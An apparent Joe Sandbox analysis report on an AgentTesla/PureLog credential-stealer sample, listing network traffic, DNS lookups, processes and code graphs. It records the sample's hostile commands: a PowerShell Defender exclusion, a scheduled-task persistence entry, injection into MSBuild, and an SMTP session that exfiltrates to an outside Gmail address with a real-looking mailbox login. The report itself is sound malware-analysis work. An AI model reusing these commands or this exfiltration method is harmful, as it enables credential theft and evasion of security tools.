                                                                                                Feb 25, 2024 21:27:35.194703102 CET8049726172.64.149.23192.168.2.4
                                                                                                Feb 25, 2024 21:27:35.194808006 CET4972680192.168.2.4172.64.149.23
                                                                                                Feb 25, 2024 21:27:35.196635008 CET8049725172.64.149.23192.168.2.4
                                                                                                Feb 25, 2024 21:27:35.196727037 CET4972580192.168.2.4172.64.149.23
                                                                                                Feb 25, 2024 21:28:06.228970051 CET4972380192.168.2.423.61.11.39
                                                                                                Feb 25, 2024 21:28:06.229237080 CET4972480192.168.2.423.61.11.8
                                                                                                Feb 25, 2024 21:28:06.324810982 CET804972423.61.11.8192.168.2.4
                                                                                                Feb 25, 2024 21:28:06.324875116 CET804972323.61.11.39192.168.2.4
                                                                                                Feb 25, 2024 21:28:06.325165033 CET4972380192.168.2.423.61.11.39
                                                                                                Feb 25, 2024 21:28:06.325174093 CET4972480192.168.2.423.61.11.8
                                                                                                Feb 25, 2024 21:28:38.104163885 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:28:38.327694893 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:28:38.488183022 CET5874973950.87.139.143192.168.2.4
                                                                                                Feb 25, 2024 21:28:38.488291979 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:28:38.488507032 CET49739587192.168.2.450.87.139.143
                                                                                                Feb 25, 2024 21:28:38.670562983 CET5874973950.87.139.143192.168.2.4
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 25, 2024 21:26:53.727617025 CET5500653192.168.2.41.1.1.1
                                                                                                Feb 25, 2024 21:26:53.850768089 CET53550061.1.1.1192.168.2.4
                                                                                                Feb 25, 2024 21:26:55.080120087 CET6211853192.168.2.41.1.1.1
                                                                                                Feb 25, 2024 21:26:55.340964079 CET53621181.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Feb 25, 2024 21:26:53.727617025 CET192.168.2.41.1.1.10xc872Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                Feb 25, 2024 21:26:55.080120087 CET192.168.2.41.1.1.10x34caStandard query (0)mail.elec-qatar.comA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Feb 25, 2024 21:26:53.850768089 CET1.1.1.1192.168.2.40xc872No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                Feb 25, 2024 21:26:53.850768089 CET1.1.1.1192.168.2.40xc872No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                Feb 25, 2024 21:26:53.850768089 CET1.1.1.1192.168.2.40xc872No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                Feb 25, 2024 21:26:55.340964079 CET1.1.1.1192.168.2.40x34caNo error (0)mail.elec-qatar.com50.87.139.143A (IP address)IN (0x0001)false
                                                                                                Feb 25, 2024 21:27:10.661001921 CET1.1.1.1192.168.2.40xd1d1No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Feb 25, 2024 21:27:10.661001921 CET1.1.1.1192.168.2.40xd1d1No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                Feb 25, 2024 21:27:23.339190006 CET1.1.1.1192.168.2.40xb39fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Feb 25, 2024 21:27:23.339190006 CET1.1.1.1192.168.2.40xb39fNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                • api.ipify.org
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449734104.26.13.2054437264C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-02-25 20:26:54 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                Host: api.ipify.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-02-25 20:26:54 UTC211INHTTP/1.1 200 OK
                                                                                                Date: Sun, 25 Feb 2024 20:26:54 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 12
                                                                                                Connection: close
                                                                                                Vary: Origin
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 85b2af99bd588227-IAD
                                                                                                2024-02-25 20:26:54 UTC12INData Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                                                Data Ascii: 89.149.18.20


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449738104.26.13.2054437644C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-02-25 20:26:57 UTC155OUTGET / HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                Host: api.ipify.org
                                                                                                Connection: Keep-Alive
                                                                                                2024-02-25 20:26:57 UTC211INHTTP/1.1 200 OK
                                                                                                Date: Sun, 25 Feb 2024 20:26:57 GMT
                                                                                                Content-Type: text/plain
                                                                                                Content-Length: 12
                                                                                                Connection: close
                                                                                                Vary: Origin
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 85b2afacffaa2093-IAD
                                                                                                2024-02-25 20:26:57 UTC12INData Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30
                                                                                                Data Ascii: 89.149.18.20


                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                Feb 25, 2024 21:26:57.403125048 CET5874973550.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Sun, 25 Feb 2024 13:26:57 -0700
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
                                                                                                Feb 25, 2024 21:26:59.084813118 CET5874973950.87.139.143192.168.2.4220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Sun, 25 Feb 2024 13:26:58 -0700
                                                                                                220-We do not authorize the use of this system to transport unsolicited,
                                                                                                220 and/or bulk e-mail.
                                                                                                Feb 25, 2024 21:26:59.085026026 CET49739587192.168.2.450.87.139.143EHLO 965543
                                                                                                Feb 25, 2024 21:26:59.267852068 CET5874973950.87.139.143192.168.2.4250-box2248.bluehost.com Hello 965543 [89.149.18.20]
                                                                                                250-SIZE 52428800
                                                                                                250-8BITMIME
                                                                                                250-PIPELINING
                                                                                                250-PIPECONNECT
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-STARTTLS
                                                                                                250 HELP
                                                                                                Feb 25, 2024 21:26:59.269817114 CET49739587192.168.2.450.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                                                                                Feb 25, 2024 21:26:59.452296019 CET5874973950.87.139.143192.168.2.4334 UGFzc3dvcmQ6
                                                                                                Feb 25, 2024 21:26:59.732983112 CET5874973950.87.139.143192.168.2.4235 Authentication succeeded
                                                                                                Feb 25, 2024 21:26:59.733164072 CET49739587192.168.2.450.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                                                                                Feb 25, 2024 21:26:59.915555954 CET5874973950.87.139.143192.168.2.4250 OK
                                                                                                Feb 25, 2024 21:26:59.915695906 CET49739587192.168.2.450.87.139.143RCPT TO:<richcompaniesltd@gmail.com>
                                                                                                Feb 25, 2024 21:27:00.140933037 CET5874973950.87.139.143192.168.2.4250 Accepted
                                                                                                Feb 25, 2024 21:27:00.141083002 CET49739587192.168.2.450.87.139.143DATA
                                                                                                Feb 25, 2024 21:27:00.323448896 CET5874973950.87.139.143192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                                Feb 25, 2024 21:27:00.324637890 CET49739587192.168.2.450.87.139.143.
                                                                                                Feb 25, 2024 21:27:00.507982016 CET5874973950.87.139.143192.168.2.4250 OK id=1reL5Q-0044j4-0l
                                                                                                Feb 25, 2024 21:28:38.104163885 CET49739587192.168.2.450.87.139.143QUIT
                                                                                                Feb 25, 2024 21:28:38.488183022 CET5874973950.87.139.143192.168.2.4221 box2248.bluehost.com closing connection

                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:21:26:49
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                                                                                                Imagebase:0x9e0000
                                                                                                File size:791'560 bytes
                                                                                                MD5 hash:6E7DF9FAE35366F13F6D83E037321608
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                                                                                                Imagebase:0xe10000
                                                                                                File size:433'152 bytes
                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp
                                                                                                Imagebase:0xe90000
                                                                                                File size:187'904 bytes
                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x200000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0xa0000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:21:26:51
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0x290000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:9
                                                                                                Start time:21:26:52
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
                                                                                                Imagebase:0xc20000
                                                                                                File size:791'560 bytes
                                                                                                MD5 hash:6E7DF9FAE35366F13F6D83E037321608
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 29%, ReversingLabs
                                                                                                • Detection: 42%, Virustotal, Browse
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:10
                                                                                                Start time:21:26:53
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff693ab0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:21:26:54
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp
                                                                                                Imagebase:0xe90000
                                                                                                File size:187'904 bytes
                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:21:26:54
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:13
                                                                                                Start time:21:26:55
                                                                                                Start date:25/02/2024
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                Imagebase:0xac0000
                                                                                                File size:262'432 bytes
                                                                                                MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:20.7%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:61.5%
                                                                                                  Total number of Nodes:26
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 5109 1191818 5110 119182a 5109->5110 5114 1199f88 5110->5114 5118 1199f77 5110->5118 5111 1191847 5115 1199fa4 5114->5115 5116 119a194 5115->5116 5122 119af78 5115->5122 5116->5111 5119 1199fa4 5118->5119 5120 119a194 5119->5120 5121 119af78 NtQueryInformationProcess 5119->5121 5120->5111 5121->5119 5123 119af8f 5122->5123 5126 119afc0 5123->5126 5127 119afe0 5126->5127 5130 119b4a8 5127->5130 5131 119b4cc 5130->5131 5132 119afa3 5131->5132 5134 119b0bc 5131->5134 5132->5115 5135 119b6f8 NtQueryInformationProcess 5134->5135 5137 119b7bf 5135->5137 5137->5131 5138 119baf0 5139 119bb1a 5138->5139 5141 119bb75 5139->5141 5142 119b134 5139->5142 5143 119cb78 OutputDebugStringW 5142->5143 5145 119cc24 5143->5145 5145->5139

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 1192440-1192463 1 119246a-11924e0 0->1 2 1192465 0->2 7 11924e3 1->7 2->1 8 11924ea-1192506 7->8 9 1192508 8->9 10 119250f-1192510 8->10 9->7 11 1192515-119252c 9->11 12 1192644-11926b6 9->12 13 1192569-1192593 9->13 14 11925c8-11925e3 9->14 15 1192598-119259c 9->15 16 11925e8-1192604 9->16 17 119252e-1192567 9->17 18 1192623-119263f 9->18 10->11 10->12 11->8 33 11926b6 call 1193d01 12->33 34 11926b6 call 11935b0 12->34 35 11926b6 call 11935a0 12->35 36 11926b6 call 1193de6 12->36 13->8 14->8 19 11925af-11925b6 15->19 20 119259e-11925ad 15->20 37 1192606 call 1192bb0 16->37 38 1192606 call 1192bc0 16->38 17->8 18->8 23 11925bd-11925c3 19->23 20->23 23->8 28 119260c-119261e 28->8 32 11926bc-11926c6 33->32 34->32 35->32 36->32 37->28 38->28
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *xZ4$Te^q$Te^q$fan$fan
                                                                                                  • API String ID: 0-1604782859
                                                                                                  • Opcode ID: 4433483661d974ab17a86420a2b933e134c7b4c678b2d463cbf4ce5227ce8675
                                                                                                  • Instruction ID: a8c4f6bc607a6bfefd8b88d5eaa95b3533c201003113ede0ed120f65af6612df
                                                                                                  • Opcode Fuzzy Hash: 4433483661d974ab17a86420a2b933e134c7b4c678b2d463cbf4ce5227ce8675
                                                                                                  • Instruction Fuzzy Hash: D081B274E002199FDB08CFAAC995AAEFBB2FF88300F14942AD515BB364D7349905CF55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 39 119c090-119c0bb 40 119c0bd 39->40 41 119c0c2-119c171 call 119c8e0 call 119cdd8 39->41 40->41 47 119c174 41->47 48 119c17b-119c197 47->48 49 119c199 48->49 50 119c1a0-119c1a1 48->50 49->47 49->50 51 119c3f9-119c414 49->51 52 119c1b8-119c1cb 49->52 53 119c338-119c34a 49->53 54 119c25a-119c295 49->54 55 119c29a-119c2ad 49->55 56 119c23a-119c24d 49->56 57 119c2b2-119c2c5 49->57 58 119c215-119c21d 49->58 59 119c4b5 49->59 60 119c454 49->60 61 119c376-119c37a 49->61 62 119c416-119c429 49->62 63 119c42b 49->63 64 119c2ca-119c2df call 119e0a0 49->64 65 119c3ca 49->65 66 119c1cd-119c1e2 49->66 67 119c3ad-119c3c8 49->67 68 119c24f-119c258 49->68 69 119c4a0-119c4b3 49->69 70 119c1a3-119c1b6 49->70 71 119c1e3 49->71 72 119c483-119c49e 49->72 50->66 77 119c3d1-119c3ed 51->77 52->48 79 119c35d-119c364 53->79 80 119c34c-119c35b 53->80 76 119c1ea-119c206 54->76 55->76 56->76 57->76 88 119c226-119c238 58->88 95 119c4d0 59->95 78 119c45b-119c477 60->78 73 119c38d-119c394 61->73 74 119c37c-119c38b 61->74 62->77 63->60 105 119c2e5-119c333 call 119a218 64->105 65->77 66->71 67->63 67->65 68->76 69->78 70->48 71->76 72->78 82 119c39b-119c3a8 73->82 74->82 84 119c208 76->84 85 119c20f-119c210 76->85 86 119c3ef 77->86 87 119c3f6-119c3f7 77->87 91 119c479 78->91 92 119c480-119c481 78->92 81 119c36b-119c371 79->81 80->81 81->76 82->76 84->51 84->53 84->54 84->55 84->56 84->57 84->58 84->59 84->60 84->61 84->62 84->63 84->64 84->65 84->67 84->68 84->69 84->71 84->72 84->85 85->67 86->51 86->59 86->60 86->62 86->63 86->65 86->69 86->72 86->87 96 119c5de-119c5e1 call 119e0a0 86->96 97 119c50b-119c52f call 119a218 86->97 98 119c60d-119c61b 86->98 99 119c6cd-119c6d7 86->99 87->63 88->76 91->59 91->60 91->69 91->72 91->92 91->95 91->96 91->97 91->98 91->99 100 119c830-119c838 91->100 101 119c6f6-119c780 91->101 102 119c7e5-119c7fe 91->102 92->59 103 119c4d7-119c4f3 95->103 112 119c5e7-119c605 96->112 116 119c53b-119c594 97->116 113 119c626-119c6c5 98->113 118 119c6df-119c6ee 99->118 133 119c7aa 101->133 134 119c782-119c78e 101->134 117 119c80a-119c82b 102->117 106 119c505-119c506 103->106 107 119c4f5 103->107 105->76 106->100 107->95 107->96 107->97 107->98 107->99 107->100 107->101 107->102 107->106 112->98 113->99 131 119c5be 116->131 132 119c596-119c5a2 116->132 117->103 118->101 138 119c5c4-119c5d6 131->138 136 119c5ac-119c5b2 132->136 137 119c5a4-119c5aa 132->137 141 119c7b0-119c7b6 133->141 139 119c798-119c79e 134->139 140 119c790-119c796 134->140 142 119c5bc 136->142 137->142 138->96 143 119c7a8 139->143 140->143 144 119c7bf-119c7dd 141->144 142->138 143->141 144->102
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2125118731
                                                                                                  • Opcode ID: 0f80852ebc9a9111c58b94f5c221d1b77bf4a7fbf8ce2c8ee366abb889d39fbd
                                                                                                  • Instruction ID: ca5fe7ee0050d62dadbc636f3fe752001f9b0349e44da35139675f0a530b7cc6
                                                                                                  • Opcode Fuzzy Hash: 0f80852ebc9a9111c58b94f5c221d1b77bf4a7fbf8ce2c8ee366abb889d39fbd
                                                                                                  • Instruction Fuzzy Hash: 59221574E04219CFDB58CFA9C984B9DBBB2BB88300F10C4AAD45ABB354DB345A81CF55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 150 11923bc-11923e0 151 1192402-1192463 150->151 152 11923e2-11923fe 150->152 154 119246a-11924e0 151->154 155 1192465 151->155 152->151 160 11924e3 154->160 155->154 161 11924ea-1192506 160->161 162 1192508 161->162 163 119250f-1192510 161->163 162->160 164 1192515-119252c 162->164 165 1192644-11926b6 162->165 166 1192569-1192593 162->166 167 11925c8-11925e3 162->167 168 1192598-119259c 162->168 169 11925e8-1192604 162->169 170 119252e-1192567 162->170 171 1192623-119263f 162->171 163->164 163->165 164->161 188 11926b6 call 1193d01 165->188 189 11926b6 call 11935b0 165->189 190 11926b6 call 11935a0 165->190 191 11926b6 call 1193de6 165->191 166->161 167->161 172 11925af-11925b6 168->172 173 119259e-11925ad 168->173 186 1192606 call 1192bb0 169->186 187 1192606 call 1192bc0 169->187 170->161 171->161 176 11925bd-11925c3 172->176 173->176 176->161 181 119260c-119261e 181->161 185 11926bc-11926c6 186->181 187->181 188->185 189->185 190->185 191->185
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
